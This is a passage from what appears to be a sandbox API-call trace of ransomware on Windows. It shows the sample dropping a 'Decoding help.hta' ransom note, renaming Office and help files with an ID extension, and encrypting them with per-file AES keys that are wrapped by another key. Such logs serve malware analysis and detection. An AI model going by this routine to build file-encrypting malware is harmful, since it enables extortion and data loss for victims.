returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0046.908] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0046.908] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSACCESS.DEV.14.1033.hxn") returned -1 [0046.908] lstrlenW (lpString="MS.MSACCESS.DEV.14.1033.hxn") returned 27 [0046.908] lstrcmpiW (lpString1="[ID]", lpString2=".hxn") returned 1 [0046.908] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.908] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0046.908] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" [0046.909] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.dev.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.909] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0046.909] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.909] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.909] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0046.909] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0046.909] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSOUC.14.1033.hxn") returned -1 [0046.909] lstrlenW (lpString="MS.MSOUC.14.1033.hxn") returned 20 [0046.909] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0046.909] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0046.909] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSOUC.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0046.909] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" [0046.909] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0046.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0051.361] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msouc.14.1033.hxn")) returned 1 [0052.164] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1 [0052.164] lstrcpyW (in: lpString1=0x671fd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0052.164] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0052.164] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" [0052.164] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft help\\decoding help.hta")) returned 0x1 [0052.164] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MS.MSPUB.14.1033.hxn") returned -1 [0052.164] lstrlenW (lpString="MS.MSPUB.14.1033.hxn") returned 20 [0052.164] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*" [0052.164] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\*.*") returned 41 [0052.164] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.MSPUB.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0052.164] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" [0052.164] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" [0052.164] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0055.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.14.1033.hxn.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x984 [0057.575] CreateFileMappingA (hFile=0x984, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x988 [0057.575] CryptAcquireContextA (in: phProv=0xdf8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xdf8fcec*=0x3448d80) returned 1 [0060.165] CryptGenKey (in: hProv=0x3448d80, Algid=0x6610, dwFlags=0x1, phKey=0xdf8fce8 | out: phKey=0xdf8fce8*=0x5d8810) returned 1 [0060.165] CryptExportKey (in: hKey=0x5d8810, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xdf8fbe4, pdwDataLen=0xdf8fce4 | out: pbData=0xdf8fbe4*, pdwDataLen=0xdf8fce4*=0x2c) returned 1 [0060.166] MapViewOfFile (hFileMappingObject=0x988, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x530000 [0063.844] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xdf8fbe4*, pdwDataLen=0xdf8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xdf8fbe4*, pdwDataLen=0xdf8fcf8*=0x100) returned 1 [0063.845] CryptEncrypt (in: hKey=0x5d8810, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0xdf8fce4*=0x140, dwBufLen=0x140 | out: pbData=0x530000*, pdwDataLen=0xdf8fce4*=0x140) returned 1 [0063.845] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0063.865] CloseHandle (hObject=0x988) returned 1 [0063.865] CryptDestroyKey (hKey=0x5d8810) returned 1 [0063.865] CryptReleaseContext (hProv=0x3448d80, dwFlags=0x0) returned 1 [0063.865] SetFilePointerEx (in: hFile=0x984, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.865] WriteFile (in: hFile=0x984, lpBuffer=0xdf8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xdf8fcf8, lpOverlapped=0x0 | out: lpBuffer=0xdf8fbe4*, lpNumberOfBytesWritten=0xdf8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0063.866] WriteFile (in: hFile=0x984, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xdf8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xdf8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0063.866] CloseHandle (hObject=0x984) returned 1 [0063.866] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.14.1033.hxn.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0063.866] FindNextFileW (in: hFindFile=0x5a5b30, lpFindFileData=0xdf8fd30 | out: lpFindFileData=0xdf8fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1 Thread: id = 180 os_tid = 0x7c0 [0040.365] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*.*", lpFindFileData=0xe0cfd30 | out: lpFindFileData=0xe0cfd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 181 os_tid = 0x5f0 [0040.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*", lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd68b1180, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd68b1180, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5bb0 [0040.366] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.366] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd68b1180, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd68b1180, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.367] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.367] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.367] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xba634e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xba634e00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0040.367] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0040.367] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0040.367] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0040.367] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.367] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.367] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033" [0040.367] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\*.*" [0040.367] GlobalMemoryStatus (in: lpBuffer=0xe20fd10 | out: lpBuffer=0xe20fd10) [0040.367] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97da508, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x280 [0040.368] CloseHandle (hObject=0x280) returned 1 [0040.368] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fd50800, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x219f7cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9fd50800, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, nFileSizeLow=0xd388, dwReserved0=0x0, dwReserved1=0x0, cFileName="AUTHZAX.DLL", cAlternateFileName="")) returned 1 [0040.368] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.368] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.368] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" [0040.368] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\decoding help.hta")) returned 0xffffffff [0040.368] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x280 [0040.370] WriteFile (in: hFile=0x280, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xe20fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.370] CloseHandle (hObject=0x280) returned 1 [0040.371] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0040.371] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AUTHZAX.DLL") returned 1 [0040.371] lstrlenW (lpString="AUTHZAX.DLL") returned 11 [0040.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.371] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="AUTHZAX.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" [0040.371] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" [0040.371] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0040.371] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0040.372] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\authzax.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x280 [0040.372] CreateFileMappingA (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x284 [0040.372] CryptAcquireContextA (in: phProv=0xe20fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xe20fcec*=0x3448588) returned 1 [0040.373] CryptGenKey (in: hProv=0x3448588, Algid=0x6610, dwFlags=0x1, phKey=0xe20fce8 | out: phKey=0xe20fce8*=0x5a5b70) returned 1 [0040.373] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xe20fbe4, pdwDataLen=0xe20fce4 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fce4*=0x2c) returned 1 [0040.373] MapViewOfFile (hFileMappingObject=0x284, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd380) returned 0x2d0000 [0040.376] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xe20fbe4*, pdwDataLen=0xe20fcf8*=0x100) returned 1 [0040.376] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000, pdwDataLen=0xe20fce4*=0xd380, dwBufLen=0xd380 | out: pbData=0x2d0000*, pdwDataLen=0xe20fce4*=0xd380) returned 1 [0040.378] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0040.379] CloseHandle (hObject=0x284) returned 1 [0040.379] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0040.379] CryptReleaseContext (hProv=0x3448588, dwFlags=0x0) returned 1 [0040.379] SetFilePointerEx (in: hFile=0x280, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.379] WriteFile (in: hFile=0x280, lpBuffer=0xe20fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0xe20fbe4*, lpNumberOfBytesWritten=0xe20fcf8*=0x100, lpOverlapped=0x0) returned 1 [0040.380] WriteFile (in: hFile=0x280, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xe20fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xe20fcf8*=0x500, lpOverlapped=0x0) returned 1 [0040.380] CloseHandle (hObject=0x280) returned 1 [0040.382] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\AUTHZAX.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0040.382] FindNextFileW (in: hFindFile=0x5a5bb0, lpFindFileData=0xe20fd30 | out: lpFindFileData=0xe20fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67b88000, ftCreationTime.dwHighDateTime=0x1cab7c7, ftLastAccessTime.dwLowDateTime=0x21b02690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67b88000, ftLastWriteTime.dwHighDateTime=0x1cab7c7, nFileSizeHigh=0x0, nFileSizeLow=0xdf80, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCSLaunch.dll", cAlternateFileName="BCSLAU~1.DLL")) returned 1 [0040.382] lstrcpyW (in: lpString1=0x10e5efc8, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*" [0040.382] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\*.*") returned 56 [0040.382] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\Decoding help.hta" 